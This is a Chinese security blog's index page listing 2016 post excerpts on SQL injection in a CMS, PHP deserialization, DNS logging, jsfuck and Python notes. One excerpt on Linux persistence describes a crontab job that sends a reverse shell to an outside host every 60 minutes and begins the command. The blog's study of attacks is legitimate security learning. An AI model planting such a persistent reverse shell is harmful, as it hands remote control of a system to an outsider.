上一页 1 ··· 7 8 9 10 11 12 13 下一页
摘要: 感谢bootstrap... 结构 本次未用到其他框架,单纯的理解一下开发模式,与mvc相比,个人在jsp中理解这个模式是: servlet做控制层,javabean做model层,前面的jsp则是view层 大概流程 访问 过滤器 jsp servlet javabean servlet jsp 阅读全文
posted @ 2016-07-03 22:19 l3m0n 阅读(1081) 评论(0) 推荐(0) 编辑
摘要: 师傅提的一个问题,感觉不错,渗透时候需要的就是收集更多信息。 http://zone.wooyun.org/content/27961 已知: 可查询回收站内存储的被删除文件 可查看回收站内存储的被删除文件的路径信息 1、powershell实现: 2、exe实现 https://github.co 阅读全文
posted @ 2016-06-21 12:15 l3m0n 阅读(1071) 评论(0) 推荐(0) 编辑
摘要: 最新版本 5.3 看wooyun厂商这忽略的架势就觉得是有点放弃治疗的想法啊。 前台会员注入 分析 http://www.wooyun.org/bugs/wooyun-2015-0117008 我看了一下最新版还有这个注入,而作者给的exp有坑处。 这是一个完善账号的功能,在核心文件里面,这个程序用 阅读全文
posted @ 2016-06-17 22:25 l3m0n 阅读(3371) 评论(1) 推荐(0) 编辑
摘要: 前言 算是在完成作业的前提下花了6天弄完,功能少而且存在大量bug以及安全问题,主要是练习mvc框架的构思,也算是第一次从前端设计到框架构写再到后端逻辑处理。记录一下遇到的坑点。 前端:bootstrap + jquery 后端:php 数据库:mysql 开发时的运行环境:phpstudy + w 阅读全文
posted @ 2016-05-29 13:57 l3m0n 阅读(525) 评论(0) 推荐(0) 编辑
摘要: win下的Dos乱码 utf 8保存的文件,在win中映射为gbk,输出文字就是乱码的,或者读取网页的时候在dos下输出,因为dos是用gbk编码,这样就容易导致出错 解决办法: 另外还有一种情况是一些软件(notepad)在保存utf 8会在文件开头插入不可见字符 可以用codecs模块来处理 p 阅读全文
posted @ 2016-05-20 16:19 l3m0n 阅读(350) 评论(0) 推荐(0) 编辑
摘要: __builtin__与__builtins__的区别与关系 python有一个内建模块,该模块会在python启动后,但在没有执行python代码前,会被加载到内存.即可用调用里面的函数,其中python2.x中是 ,python3.x中更名为 输出 即在python代码中我们可以直接使用这些函数 阅读全文
posted @ 2016-05-14 22:20 l3m0n 阅读(2223) 评论(2) 推荐(0) 编辑
摘要: Linux权限维持 前言 并未深入研究backdoor是怎么写的,只是研究一下网上存在的几种后门的用法。 测试环境:centos 6.5 crontab 计划任务,永远的爱 每60分钟反弹一次shell给dns.wuyun.org的53端口 (crontab l;printf " /60 exec 阅读全文
posted @ 2016-05-13 12:49 l3m0n 阅读(1895) 评论(0) 推荐(0) 编辑
摘要: 0x01 tip: 对于企业那种,可能会在源码中看到一些虚拟主机配置后,在内网里面是使用hosts,由于没对其进行限制,可导致外网访问其内容 即修改一下本地的hosts: 0x02 tip: "jsfuck下载" 直接运行时弹框: /NO TIP/ 他的函数运行规则是,所以重在这个函数体 jsfuc 阅读全文
posted @ 2016-05-09 19:51 l3m0n 阅读(1260) 评论(0) 推荐(0) 编辑
摘要: 上计算机网络课的时候并没怎么认真听啊,导致都是很懵逼的状态,记录一下。 dns请求是通过udp实现,http请求是通过tcp完成 通过这点就可以利用套接字来实现一个小小的cloudeye http_dns_log: 一般用python自带的去接收请求log 利用 判断: 本文来自:http://zo 阅读全文
posted @ 2016-05-09 19:38 l3m0n 阅读(445) 评论(0) 推荐(0) 编辑
摘要: [TOC] 1. 基础 1.1 什么是序列化 序列化是对象串行化,对象是一种在内存中存储的数据类型,寿命是随生成该对象的程序的终止而终止,为了持久使用对象的状态,将其通过serialize()函数进行序列化为一行字符串保存为文件,使用时再用unserialize()反序列化为对象 序列化后的格式: 阅读全文
posted @ 2016-04-19 00:55 l3m0n 阅读(5448) 评论(3) 推荐(0) 编辑
上一页 1 ··· 7 8 9 10 11 12 13 下一页